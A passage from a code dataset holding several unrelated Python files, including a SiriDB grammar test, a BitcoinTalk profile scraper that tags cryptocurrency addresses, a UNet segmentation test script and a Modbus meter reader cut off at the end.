elapsed = str(datetime.timedelta(seconds=elapsed))\n print(\"Finished. Total elapsed time (h:m:s): {}.\".format(elapsed))\n\n return cmc[0]\n","repo_name":"blue-blue272/BiCnet-TKS","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":4510,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"82"} +{"seq_id":"39109928240","text":"import re\nimport random\nimport asyncio\nimport functools\nimport random\nimport time\nimport os\nimport sys\nfrom math import nan\nfrom testing import default_test_setup\nfrom testing import parse_args\nfrom testing import run_test\nfrom testing import Server\nfrom testing import SiriDB\nfrom testing import TestBase\nfrom testing.constants import PYGRAMMAR_PATH\nfrom querygenerator.querygenerator import QueryGenerator\nfrom querygenerator.k_map import k_map\nsys.path.append(PYGRAMMAR_PATH)\nfrom grammar import SiriGrammar # nopep8\n\n\ndef gen_simple_data(m, n):\n series = {\n str(a).zfill(6): [[b*n+a, random.randint(0, 20)] for b in range(n)]\n for a in range(m)}\n return series\n\n\ndef update_k_map_show(show):\n kv = {a['name']: a['value'] for a in show['data']}\n k_map['r_integer']['k_active_handles'] = kv['active_handles']\n k_map['r_doubleq_str']['k_buffer_path'] = '\"'+kv['buffer_path']+'\"'\n k_map['r_integer']['k_buffer_size'] = kv['buffer_size']\n k_map['r_doubleq_str']['k_dbpath'] = '\"'+kv['dbpath']+'\"'\n k_map['r_float']['k_drop_threshold'] = kv['drop_threshold']\n k_map['r_doubleq_str']['k_ip_support'] = '\"'+kv['ip_support']+'\"'\n k_map['r_doubleq_str']['k_libuv'] = '\"'+kv['libuv']+'\"'\n k_map['r_integer']['k_max_open_files'] = kv['max_open_files']\n k_map['r_integer']['k_mem_usage'] = kv['mem_usage']\n k_map['r_integer']['k_open_files'] = kv['open_files']\n k_map['r_integer']['k_pool'] = kv['pool']\n k_map['r_integer']['k_received_points'] = kv['received_points']\n k_map['r_uinteger']['k_list_limit'] = kv['list_limit']\n k_map['r_integer']['k_startup_time'] = kv['startup_time']\n k_map['r_doubleq_str']['k_status'] = '\"'+kv['status']+'\"'\n k_map['r_doubleq_str']['k_sync_progress'] = '\"'+kv['sync_progress']+'\"'\n k_map['r_doubleq_str']['k_timezone'] = '\"'+kv['timezone']+'\"'\n k_map['r_integer']['k_uptime'] = kv['uptime']\n k_map['r_uuid_str']['r_uuid_str'] = kv['uuid']\n k_map['r_doubleq_str']['k_server'] = '\"'+kv['server']+'\"'\n k_map['r_doubleq_str']['uuid'] = '\"'+kv['server']+'\"'\n k_map['r_doubleq_str']['k_version'] = '\"'+kv['version']+'\"'\n k_map['r_uinteger']['k_port'] = kv['server'].split(':', 1)[1]\n k_map['r_uinteger']['k_select_points_limit'] = \\\n kv['select_points_limit']\n k_map['r_doubleq_str']['k_reindex_progress'] = \\\n '\"'+kv['reindex_progress']+'\"'\n\n\nclass TestGrammar(TestBase):\n title = 'Test from grammar'\n\n async def test_create_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': ''\n }})\n for q in qb.generate_queries('create_stmt'):\n await self.client0.query(q)\n\n async def test_select_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': '',\n 'k_filter': '', # skip because only number type series\n 'k_prefix': '', # skip\n 'k_suffix': '', # skip\n 'k_merge': '', # skip\n 'k_where': '', # skip\n 'after_expr': '', # skip\n 'before_expr': '', # skip\n 'between_expr': '', # skip\n }\n })\n for q in qb.generate_queries('select_stmt'):\n await self.client0.query(q)\n\n async def test_revoke_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': ''\n }})\n for q in qb.generate_queries('revoke_stmt'):\n await self.client0.query(q)\n\n async def test_grant_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': ''\n }})\n for q in qb.generate_queries('grant_stmt'):\n await self.client0.query(q)\n\n async def test_alter_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': '',\n 'k_now': '', # not possible (set expiration num/log)\n 'set_name': '', # skip\n 'set_address': '', # not possible\n 'set_port': '', # not possible\n 'set_timezone': '', # same value error\n 'set_log_level': '', # not required, but skip to keep loglevel\n }})\n for q in qb.generate_queries('alter_stmt'):\n await self.client0.query(q)\n\n async def test_count_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': ''\n }})\n for q in qb.generate_queries('count_stmt'):\n await self.client0.query(q)\n\n async def test_list_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': ''\n }})\n for q in qb.generate_queries('list_stmt'):\n await self.client0.query(q)\n\n async def test_drop_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': '',\n 'drop_server': '', # not possible\n }})\n for q in qb.generate_queries('drop_stmt'):\n await self.client0.query(q)\n\n async def test_show_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': ''\n }})\n for q in qb.generate_queries('show_stmt'):\n await self.client0.query(q)\n\n @default_test_setup(1)\n async def run(self):\n await self.client0.connect()\n\n # await self.db.add_pool(self.server1, sleep=2)\n\n update_k_map_show(await self.client0.query('show'))\n\n series = gen_simple_data(20, 70)\n\n await self.client0.insert(series)\n await self.client0.query('create group `GROUP_OR_TAG` for /00000.*/')\n\n await self.test_create_stmt()\n\n time.sleep(2)\n\n await self.test_count_stmt()\n\n await self.test_list_stmt()\n\n await self.test_select_stmt()\n\n await self.test_revoke_stmt()\n\n await self.test_grant_stmt()\n\n await self.test_alter_stmt()\n\n await self.test_drop_stmt()\n\n await self.test_show_stmt()\n\n self.client0.close()\n\n return False\n\n\nclass TestGrammarStart(TestBase):\n\n async def test_all_stmts(self, client):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': '',\n 'r_comment': '',\n 'k_timeit': '',\n 'select_stmt': '',\n 'list_stmt': '',\n 'count_stmt': '',\n\n 'alter_group': '',\n # 'drop_group': '',\n 'alter_server': '',\n 'drop_server': '',\n 'alter_user': '',\n 'drop_user': '',\n\n # 'set_address': '',\n # 'set_port': '',\n 'set_timezone': '',\n 'set_log_level': '', # not required, skip to keep log level\n 'set_expiration_num': '',\n 'set_expiration_log': '',\n\n 'k_prefix': '',\n 'k_suffix': '',\n 'k_filter': '',\n # 'k_where': '',\n 'after_expr': '',\n 'before_expr': '',\n 'between_expr': '',\n 'k_merge': '',\n }\n })\n for q in qb.generate_queries():\n await self.client0.query(q)\n\n @default_test_setup(1)\n async def run(self):\n await self.client0.connect()\n\n # await self.db.add_pool(self.server1, sleep=2)\n\n update_k_map_show(await self.client0.query('show'))\n\n series = gen_simple_data(20, 70)\n\n await self.client0.insert(series)\n await self.client0.query('create group `GROUP_OR_TAG` for /00000.*/')\n # time.sleep(2)\n await self.test_all_stmts()\n self.client0.close()\n return False\n\n\nif __name__ == '__main__':\n parse_args()\n run_test(TestGrammar())\n","repo_name":"SiriDB/siridb-server","sub_path":"itest/test_grammar.py","file_name":"test_grammar.py","file_ext":"py","file_size_in_byte":8370,"program_lang":"python","lang":"en","doc_type":"code","stars":486,"dataset":"github-code","pt":"82"} +{"seq_id":"70686909707","text":"#!/usr/bin/env python3\n\"\"\"\nConvert BitcoinTalk users data to a TagPack.\n\"\"\"\nimport os\nimport re\nimport sys\nimport json\nimport time\nfrom datetime import datetime, date\nfrom typing import List, Union, TextIO\n\nimport yaml\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.firefox.options import Options\n\n# Taken from Sanctioned NBCTF generator and modified\nREGEX = [\n ('BTC', re.compile(r'\\b((bc(0([ac-hj-np-z02-9]{39}|[ac-hj-np-z02-9]{59})|1[ac-hj-np-z02-9]{8,87}))|[13][a-km-zA-HJ-NP-Z1-9]{25,34})\\b')),\n ('BCH', re.compile(r'\\b(((?:bitcoincash|bchtest):)?([13][0-9a-zA-Z]{33}))|\\b(((?:bitcoincash|bchtest):)?(qp)?[0-9a-zA-Z]{40})\\b')),\n ('LTC', re.compile(r'\\b([LM3][a-km-zA-HJ-NP-Z1-9]{25,33})\\b')),\n ('ZEC', re.compile(r'\\b([tz][13][a-km-zA-HJ-NP-Z1-9]{33})\\b')),\n ('ETH', re.compile(r'\\b((0x)?[0-9a-fA-F]{40})\\b'))\n]\n\nBITCOINTALK_PROFILE_URL = 'https://bitcointalk.org/index.php?action=profile;u={user_id}'\n\nclass RawData:\n \"\"\"\n Download and read data provided by the source.\n \"\"\"\n def __init__(self, fn: str, url: str):\n self.fn = fn\n self.url = url\n\n @staticmethod\n def download_profile(wd: webdriver.Remote, user_id: int) -> Union[dict, None]:\n url = BITCOINTALK_PROFILE_URL.format(user_id=user_id)\n for _ in range(5):\n try:\n wd.get(url)\n except TimeoutException:\n print('Retrying URL {url} (retry {retry})'.format(url=url, retry=_+1), file=sys.stderr)\n continue\n else:\n break\n # If no profile found, exit here\n if wd.title == 'An Error Has Occurred!':\n return None\n # So we got a user profile, which we put into a dictionary\n data = {'user_id': user_id}\n for entry in wd.find_elements(By.XPATH, '//table/tbody/tr/td/table/tbody/tr[2]/td[1]/table/tbody/tr'):\n try:\n key = entry.find_element(By.XPATH, 'td[1]/b').text\n except NoSuchElementException:\n continue # No key, hence no information here\n try:\n value = entry.find_element(By.XPATH, 'td[2]').text\n except NoSuchElementException:\n continue # No value, hence no information here\n # Normalise key and value\n key = key.strip().lower().replace(':', '').replace(' ', '_')\n value = value.strip()\n # Skip entry with either empty key or empty value\n if not key or not value:\n continue\n # E-mail address is always hidden, hence we skip it\n if key == 'email':\n continue\n # Age may be hidden; if so, we skip the entry too\n if key == 'age' and value == 'N/A':\n continue\n # Convert values in certain entries to integers\n if key in ('posts', 'activity', 'merit', 'age'):\n value = int(value)\n # Add entry to the profile data\n data[key] = value\n # Also scrape signature\n try:\n signature = wd.find_element(By.XPATH, '//div[@class=\"signature\"]').text\n except NoSuchElementException:\n pass\n else:\n if signature:\n data['signature'] = signature\n # ... and avatar URL\n try:\n avatar_url = wd.find_element(By.XPATH, '//img[@class=\"avatar\"]').get_attribute('src')\n except NoSuchElementException:\n pass\n else:\n if avatar_url:\n data['avatar_url'] = avatar_url\n # ... and avatar text\n try:\n avatar_text = ' '.join([el.text for el in wd.find_elements(By.XPATH, '//img[@class=\"avatar\"]/..')]).strip()\n except NoSuchElementException:\n pass\n else:\n if avatar_text:\n data['avatar_text'] = avatar_text\n #print(data)\n return data\n\n def download_profiles(self, out_file: TextIO, wd: webdriver.Remote, starting_user_id: int):\n user_id = last_valid_user_id = starting_user_id\n while True:\n # Exit if we could not fetch too many profiles\n if user_id - last_valid_user_id >= 1000:\n break\n # Fetch profile and, if valid, save it\n profile = self.download_profile(wd, user_id)\n if profile is not None:\n last_valid_user_id = user_id\n print(json.dumps(profile, ensure_ascii=False), file=out_file)\n # We pause for 1 second to confirm to the rules of the forum\n time.sleep(1)\n user_id += 1\n\n @staticmethod\n def get_max_user_id(file: TextIO) -> int:\n user_id = 0\n for line in file:\n profile = json.loads(line)\n user_id = max(profile['user_id'], user_id)\n return user_id\n\n @staticmethod\n def get_missing_user_ids(file: TextIO, max_id: int) -> List[int]:\n user_ids = set()\n for line in file:\n profile = json.loads(line)\n user_ids.add(profile['user_id'])\n return [user_id for user_id in range(1, max_id + 1) if user_id not in user_ids]\n\n def download_missing_profiles(self, out_file: TextIO, wd: webdriver.Remote, missing_ids: List[int]):\n for user_id in missing_ids:\n profile = self.download_profile(wd, user_id)\n if profile is not None:\n print(json.dumps(profile, ensure_ascii=False), file=out_file)\n time.sleep(1)\n\n def download(self, update=False):\n # Create Firefox webdriver, do not load Javascript and image files\n options = Options()\n options.set_preference('javascript.enabled', False)\n options.set_preference('permissions.default.image', 2)\n wd = webdriver.Firefox(options=options)\n # Scrape user profiles\n if update:\n # Calculate next user id\n with open(self.fn, 'r', encoding='utf-8') as jsonlines_file:\n next_user_id = self.get_max_user_id(jsonlines_file) + 1\n print('Starting with user ID {next_user_id}'.format(next_user_id=next_user_id))\n # Proceed with next user id\n with open(self.fn, 'a', encoding='utf-8') as jsonlines_file:\n self.download_profiles(jsonlines_file, wd, next_user_id)\n else:\n with open(self.fn, 'w', encoding='utf-8') as jsonlines_file:\n self.download_profiles(jsonlines_file, wd, 1)\n # Calculate missing user ids and try to download them again. This should add missing profiles.\n with open(self.fn, 'r', encoding='utf-8') as jsonlines_file:\n max_user_id = self.get_max_user_id(jsonlines_file)\n with open(self.fn, 'r', encoding='utf-8') as jsonlines_file:\n missing_user_ids = self.get_missing_user_ids(jsonlines_file, max_user_id)\n print('Found {len} missing user IDs; trying to re-fetch them...'.format(len=len(missing_user_ids)))\n with open(self.fn, 'a', encoding='utf-8') as jsonlines_file:\n self.download_missing_profiles(jsonlines_file, wd, missing_user_ids)\n # Clean up\n wd.quit()\n os.remove('geckodriver.log')\n\n def read(self) -> List[dict]:\n with open(self.fn, 'r', encoding='utf-8') as jsonlines_file:\n return [json.loads(line) for line in jsonlines_file]\n\n\nclass TagPackGenerator:\n \"\"\"\n Generate a TagPack from BitcoinTalk users data.\n \"\"\"\n\n def __init__(self, rows: List[dict], title: str, creator: str, description: str, lastmod: date, source: str):\n self.rows = rows\n self.data = {\n 'title': title,\n 'creator': creator,\n 'description': description,\n 'lastmod': lastmod,\n 'category': 'user', # like in the OFAC TagPack generator\n 'tags': []\n }\n self.source = source\n\n def generate(self):\n tags = []\n for row in self.rows:\n user_addresses = {}\n for key, value in row.items():\n if type(value) != str:\n continue\n for currency, address_pattern in REGEX:\n for match in address_pattern.finditer(value):\n address = match.group(0)\n if address not in user_addresses:\n user_addresses[address] = currency\n #if user_addresses:\n # print(row['user_id'], user_addresses)\n for address, currency in user_addresses.items():\n tag = {\n 'address': address,\n 'currency': currency,\n 'label': 'User {name} at BitcoinTalk forum'.format(name=row['name']),\n 'source': BITCOINTALK_PROFILE_URL.format(user_id=row['user_id'])\n }\n tags.append(tag)\n self.data['tags'] = tags\n\n def saveYaml(self, fn: str):\n with open(fn, 'w', encoding='utf-8') as f:\n f.write(yaml.dump(self.data, sort_keys=False))\n\n\nif __name__ == '__main__':\n with open('config.yaml', 'r') as config_file:\n config = yaml.safe_load(config_file)\n\n raw_data = RawData(config['RAW_FILE_NAME'], config['URL'])\n update_raw_data = len(sys.argv) >= 2 and sys.argv[1] == 'update'\n if not os.path.exists(config['RAW_FILE_NAME']) or update_raw_data:\n raw_data.download(update_raw_data)\n\n last_mod = datetime.fromtimestamp(os.path.getmtime(config['RAW_FILE_NAME'])).date()\n generator = TagPackGenerator(raw_data.read(), config['TITLE'], config['CREATOR'], config['DESCRIPTION'],\n last_mod, config['SOURCE'])\n generator.generate()\n generator.saveYaml(config['TAGPACK_FILE_NAME'])\n","repo_name":"INTERPOL-Innovation-Centre/TagPackConverters","sub_path":"Bitcointalk Users/generateTagPack.py","file_name":"generateTagPack.py","file_ext":"py","file_size_in_byte":9869,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"82"} +{"seq_id":"1317281829","text":"import sys\r\n#sys.stdin = open(\"input.txt\",\"rt\") #채점시 꼭 주석처리 할것\r\n\r\nc,n = map(int,(input().split()))\r\n#lst = list(map(int,input().split()))\r\nlst =[]\r\nfor i in range(n):\r\n lst.append(int(input()))\r\n \r\n\r\n\r\ndef DFS(L,sum,tsum):\r\n global max_s\r\n if sum+(total-tsum) < max_s:\r\n return\r\n if sum > c: \r\n return\r\n elif L ==n :\r\n if sum > max_s:\r\n max_s = sum\r\n return\r\n else: \r\n DFS(L+1,sum+lst[L],tsum+lst[L]) #현재강아지선택\r\n DFS(L+1,sum,tsum+lst[L]) #현재강아지선택x\r\n\r\ntotal = sum(lst)\r\nmax_s = -1\r\nDFS(0,0,0)\r\nprint(max_s)\r\n","repo_name":"100race/algorithm-study","sub_path":"algorithm/강아지승차_DFS.py","file_name":"강아지승차_DFS.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"4596795328","text":"#!/usr/bin/env python\n\ndef configuration(parent_package='',top_path=None):\n #from numpy.distutils.system_info import get_info, NotFoundError\n from numpy.distutils.misc_util import Configuration\n\n #lapack_opt = get_info('lapack_opt')\n config = Configuration('amg_core', parent_package, top_path)\n\n config.add_extension('_amg_core', \n define_macros=[('__STDC_FORMAT_MACROS', 1)], \n sources=['amg_core_wrap.cxx'])\n #extra_info = lapack_opt)\n\n return config\n\nif __name__ == '__main__':\n from numpy.distutils.core import setup\n setup(**configuration(top_path='').todict())\n\n","repo_name":"pombreda/pyamg","sub_path":"pyamg/amg_core/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"41254391038","text":"\"\"\"Functions that deal with geographic data that does not vary over time\n\nThis type of data varies based on geography, but does not differ across\ndifferent time periods (or at least not on a relevant scale). For instance,\na raster of euclidean distance to airports would be included in this category\n\"\"\"\n\nfrom s3_utils import get_from_s3\nfrom raster_utils import raster_to_array\nimport numpy as np\n\n\ndef tiff_to_array(path):\n \"\"\"Function that loads a geotiff into a numpy array\n\n Args:\n path (str): s3 or local path to load tiff from\n\n Returns:\n numpy array\n \"\"\"\n\n if path.startswith('s3'):\n local_raster_path = get_from_s3(path)\n else:\n local_raster_path = path\n\n return raster_to_array(local_raster_path)\n\n\ndef get_mask_indices(path):\n \"\"\"Helper function to get raster mask for NYC\n\n Returns:\n list: returns list of tuples (row, column) that represent area of interest\n \"\"\"\n raster = tiff_to_array(path)\n indices = []\n it = np.nditer(raster, flags=['multi_index'])\n while not it.finished:\n if it[0] == 1:\n r, c = it.multi_index\n indices.append((r, c))\n it.iternext()\n return indices\n","repo_name":"notthatbreezy/nyc-taxi-spark-ml","sub_path":"python/geo_vars.py","file_name":"geo_vars.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"82"} +{"seq_id":"39634058777","text":"\"\"\"\nhttps://atcoder.jp/contests/abc210/tasks/abc210_c\n\"\"\"\n\nN, K = map(int, input().split())\ncandies = list(map(int, input().split()))\n\nfrom collections import deque\nfrom collections import defaultdict as dd\nq = deque()\ncolors = dd(lambda: 0)\n\nmax_kinds = 0\nfor i in range(N):\n current_color = candies[i]\n q.append(current_color)\n colors[current_color] += 1\n if i >= K:\n old_color = q.popleft()\n colors[old_color] -= 1\n if colors[old_color] == 0:\n del colors[old_color]\n max_kinds = max(max_kinds, len(colors))\n\nprint(max_kinds)\n","repo_name":"sugirin/AtCoder","sub_path":"src/abc210/abc210_c.py","file_name":"abc210_c.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"8881620836","text":"from django.test import TestCase\nfrom django.utils.crypto import get_random_string\n\nfrom custom_auth.models import User\nfrom .. import models\n\n\nclass TestCaseWithUser(TestCase):\n username = None\n user = None\n\n @classmethod\n def setUpTestData(cls):\n cls.username = get_random_string(length=10)\n\n User.objects.create(\n username=cls.username,\n password=get_random_string(length=10)\n )\n\n def setUp(self):\n self.user = User.objects.get(username=self.__class__.username)\n self.assertIsNotNone(self.user)\n\n\nclass TestCaseWithFileSystem(TestCaseWithUser):\n parent_name = None\n parent_dir = None\n\n @classmethod\n def setUpTestData(cls):\n super().setUpTestData()\n cls.parent_name = get_random_string(length=10)\n\n models.Directory.objects.create(\n name=cls.parent_name,\n owner=User.objects.get(username=cls.username)\n )\n\n def setUp(self):\n super().setUp()\n self.parent_dir = models.Directory.objects.get(name=self.__class__.parent_name)\n self.assertIsNotNone(self.parent_dir)","repo_name":"margdoc/awww-framac","sub_path":"mainpage/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"73014855310","text":"import torch\nfrom TrainSegmentationNetwork.Train_UNet import calc_loss\nfrom TrainSegmentationNetwork.UNetLoader_dynamic import UNetDatasetDynamicMask\nfrom UNet.PlotSegmentationResults import plot_result\nfrom UNet.BatchNormUNet import UNet\nfrom argparse import ArgumentParser\nimport re\nfrom collections import defaultdict\nimport numpy as np\nimport skimage\nimport skimage.segmentation as seg\nimport skimage.filters as filters\nimport skimage.morphology as morph\nfrom PIL import Image\nfrom TrainSegmentationNetwork.IntersectionOverUnion import calculateIoU\nfrom torch.nn.functional import softmax\n\n\"\"\"\nMartin Leipert\nmartin.leipert@fau.de\n\n\"\"\"\n\n\nBATCH_SIZE = 1\n\nNUM_CLASSES = 4\n\nTEST_LOSSES_WEIGHTING = {\n\t\"BCE_LOSS\": 1,\n\t\"DICE_LOSS\": 1,\n\t\"FOCAL_LOSS\": 1\n}\n\n\ndef main():\n\targ_parser = ArgumentParser(\"Test the Unet on the defined test data\")\n\targ_parser.add_argument(\"model_name\", help=\"pth file to the model\")\n\n\tparsed_args = arg_parser.parse_args()\n\n\tmodel_name = parsed_args.model_name\n\n\tset_name = \"small_set\"\n\n\tfile_list_test = \"/home/martin/Forschungspraktikum/Testdaten/Segmentation_Sets/%s/test.txt\" % set_name\n\n\ttest_data = UNetDatasetDynamicMask(file_list_test, region_select=False)\n\ttest_loader = torch.utils.data.DataLoader(test_data, batch_size=BATCH_SIZE)\n\n\t# Evaluate on CUDA if possible\n\tdevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\tmodel_network = UNet(NUM_CLASSES)\n\tmodel_network.load_state_dict(torch.load(\"TrainedModels/%s\" % model_name))\n\tmodel_network.to(device)\n\n\tbase_name = model_name.rstrip(\".pth\")\n\n\tmetrics = defaultdict(float)\n\t# {'focal': 0, 'dice': 0, 'bce': 0, 'loss': 0}\n\n\tmodel_network.eval()\n\ttorch.no_grad()\n\n\n\tloss_sum = 0\n\n\tconfusion = np.zeros([4, 2])\n\n\tground_truth = np.zeros([4])\n\n\tiou = np.zeros((4, 1))\n\n\t# Testings\n\tfor images, masks, image_paths in test_loader:\n\t\timages = images.to(device)\n\t\tmasks = masks.to(device)\n\n\t\t# forward\n\t\t# track history if only in train\n\t\toutputs = model_network(images)\n\t\toutputs = outputs.detach()\n\t\tmasks = masks.detach()\n\t\timages = images.detach()\n\n\t\tloss = calc_loss(outputs, masks, metrics, TEST_LOSSES_WEIGHTING)\n\n\t\t# Update the losses\n\t\tloss_sum += loss / len(images)\n\n\t\tplot_result(outputs, images, base_name, image_paths)\n\n\t\tthis_confusion, gt, this_iou = get_segmented_area(outputs, masks, images, image_paths)\n\t\tconfusion = np.add(confusion, this_confusion)\n\t\tground_truth = np.add(ground_truth, gt)\n\t\tiou += this_iou\n\n\tiou = iou / len(test_loader.dataset.input_images)\n\tconfusion = confusion / len(test_loader.dataset.input_images)\n\tground_truth = ground_truth / len(test_loader.dataset.input_images)\n\tprint(\"Ground truth\")\n\tprint(ground_truth)\n\n\tprint(f\"Overall loss {loss_sum.cpu().item()}\")\n\n\tprint(\"IOU: %.5f\\t\\t%.5f\\t\\t%.5f\\t\\t%.5f\\n\" % tuple(iou[:, 0]))\n\tdenote_result(base_name, loss_sum, metrics, confusion, iou)\n\n\ndef get_segmented_area(prediction, org_mask, raw_images, image_paths):\n\n\tprediction = torch.sigmoid(prediction.double())\n\tprediction = softmax(prediction, 1)\n\tprediction = prediction.cpu().numpy()\n\n\n\torg_mask = org_mask.detach().cpu().numpy()\n\traw_images = raw_images.detach().cpu().numpy()\n\n\tiou = calculateIoU(prediction, org_mask)\n\n\tclass_labels = np.argmax(prediction, axis=1)\n\n\timage_size = 224*224\n\n\tfull_confusion = np.zeros([4, 2])\n\tground_truth = np.zeros(4)\n\n\tfor i in range(prediction.shape[0]):\n\n\t\tlocal_mask = org_mask[i, :, :, :]\n\t\tmask_labels = np.argmax(local_mask, axis=0)\n\t\tlocal_labels = class_labels[i, :, :]\n\n\t\timage = raw_images[i, :, :]\n\t\traw_im = np.zeros(list(image.shape[1:3]) + [3])\n\n\t\tfor i in range(3):\n\t\t\traw_im[:, :, i] = image[i, :, :]\n\n\t\timage = Image.fromarray(np.uint8(raw_im*256))\n\t\timage = image.convert(\"L\")\n\t\tthresh = filters.threshold_otsu(np.array(image))\n\t\ttext_or_sign = image < thresh\n\t\tbackground = image > thresh\n\n\t\tconfusion = np.zeros([4, 2])\n\t\tfor i in range(4):\n\t\t\tground_truth[i] += np.where(mask_labels == i, 1, 0).sum(0).sum(0) / image_size\n\n\t\t\tcorrect = np.where(np.logical_and(local_labels == i, mask_labels == i), 1, 0).sum(0).sum(0) / image_size\n\t\t\tfalse = np.where(np.logical_and(local_labels == i, mask_labels != i), 1, 0).sum(0).sum(0) / image_size\n\n\t\t\tconfusion[i, 0] = correct\n\t\t\tconfusion[i, 1] = false\n\n\t\t\tpass\n\t\tfull_confusion = np.add(full_confusion, confusion)\n\n\t\"\"\"\n\t# Missclassified area:\n\tsubtraction = new_mask - org_mask\n\tsubtraction = np.where(subtraction < 0, 0, subtraction)\n\n\tmissclassified = subtraction.sum(axis=0).sum(axis=0)\n\torg_images = []\n\n\tfor raw_im in raw_images:\n\n\t\timage = Image.open(org_im)\n\t\timage = image.convert(\"L\")\n\n\t\t# Correctly classified area:\n\t\t# Use Otsu thresholding\n\n\t\timage = Image.fromarray(raw_im)\n\n\t\tsegmented = filters.threshold_otsu(image)\n\t\tmorph.binary_dilation(segmented, out=segmented)\n\t\torg_images.append(segmented)\n\n\t\"\"\"\n\treturn full_confusion, ground_truth, iou\n\n\ndef denote_result(base_name, loss, metrics, confusion, iou):\n\n\twith open(f\"Results/{base_name}_test_result.txt\", \"w+\") as open_file:\n\t\topen_file.write(f\"Loss on Test_data{loss}\\n\")\n\t\topen_file.write(f\"BCE Loss on Test_data{metrics['BCE_LOSS']}\\n\")\n\t\topen_file.write(f\"Dice Loss on Test_data{metrics['DICE_LOSS']}\\n\")\n\t\topen_file.write(f\"Focal Loss on Test_data{metrics['FOCAL_LOSS']}\\n\")\n\t\topen_file.write(\"\\n\")\n\t\topen_file.write(\"----- Confusion: -----\\n\")\n\t\tfor i in range(4):\n\t\t\topen_file.write(\"%i: %.5f | %.5f \\n\" % (i, confusion[i, 0], confusion[i, 1]))\n\n\t\topen_file.write(\"\\n\")\n\t\topen_file.write(\"IOU: %.5f\\t\\t%.5f\\t\\t%.5f\\t\\t%.5f\\n\" % tuple(iou[:, 0]))\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"martinleipert/Forschungspraktikum","sub_path":"TrainSegmentationNetwork/TestUNetOnData.py","file_name":"TestUNetOnData.py","file_ext":"py","file_size_in_byte":5510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25845686288","text":"#!/usr/bin/python\n\nimport minimalmodbus\n\nrs485 = minimalmodbus.Instrument('/dev/cu.usbserial-FTYXZ40E', 1)\nrs485.serial.baudrate = 9600\nrs485.serial.bytesize = 8\nrs485.serial.parity = minimalmodbus.serial.PARITY_NONE\nrs485.serial.stopbits = 1\nrs485.serial.timeout = 1\nrs485.debug = False\nrs485.mode = minimalmodbus.MODE_RTU\n#print(rs485)\n\nSimple_Voltage = rs485.read_long(50520, functioncode=3, signed=False) / 100.0 # U32 V/100\nFrequency = rs485.read_long(50526, functioncode=3, signed=False) / 100.0 # U32 Hz/100\nCurrent = rs485.read_long(50528, functioncode=3, signed=False) / 1000.0 # U32 A/1000\nSum_Active_Power = rs485.read_long(50536, functioncode=3, signed=True) / 0.1 # S32 W/0.1\nSum_Reactive_Power = rs485.read_long(50538, functioncode=3, signed=True) / 0.1 # S32 VAr/0.1\nSum_Apparent_Power = rs485.read_long(50540, functioncode=3, signed=False) / 0.1 # U32 VA/0.1\nSum_Power_Factor = rs485.read_long(50542, functioncode=3, signed=True) / 1000 # S32 -/1000\nActive_Power_Phase1 = rs485.read_long(50544, functioncode=3, signed=True) / 0.1 # S32 W/0.1\nReactive_Power_Phase1 = rs485.read_long(50550, functioncode=3, signed=True) / 0.1 # S32 var/0.1\nApparent_Power_Phase1 = rs485.read_long(50556, functioncode=3, signed=False) / 0.1 # U32 VA/0.1\nPower_Factor_Phase1 = rs485.read_long(50562, functioncode=3, signed=True) / 1000 # U32 -/1000\n\nActive_Energy = rs485.read_long(36868, functioncode=3, signed=False) # U32 Wh\n\nprint('Simple Voltage: {0:.2f} Volts'.format(Simple_Voltage))\nprint('Frequency: {0:.2f} Hz'.format(Frequency))\nprint('Current: {0:.3f} Amps'.format(Current))\nprint('Sum Active Power: {0:.1f} Watts'.format(Sum_Active_Power))\nprint('Sum Reactive Power: {0:.1f} VAr'.format(Sum_Reactive_Power))\nprint('Sum Apparent Power: {0:.1f} VoltAmps'.format(Sum_Apparent_Power))\nprint('Sum Power Factor: {0:.3f}'.format(Sum_Power_Factor))\nprint('Active Power Phase 1: {0:.1f} Watt'.format(Active_Power_Phase1))\nprint('Reactive Power Phase 1: {0:.1f} Watt'.format(Reactive_Power_Phase1))\nprint('Apparent Power Phase 1: {0:.1f} 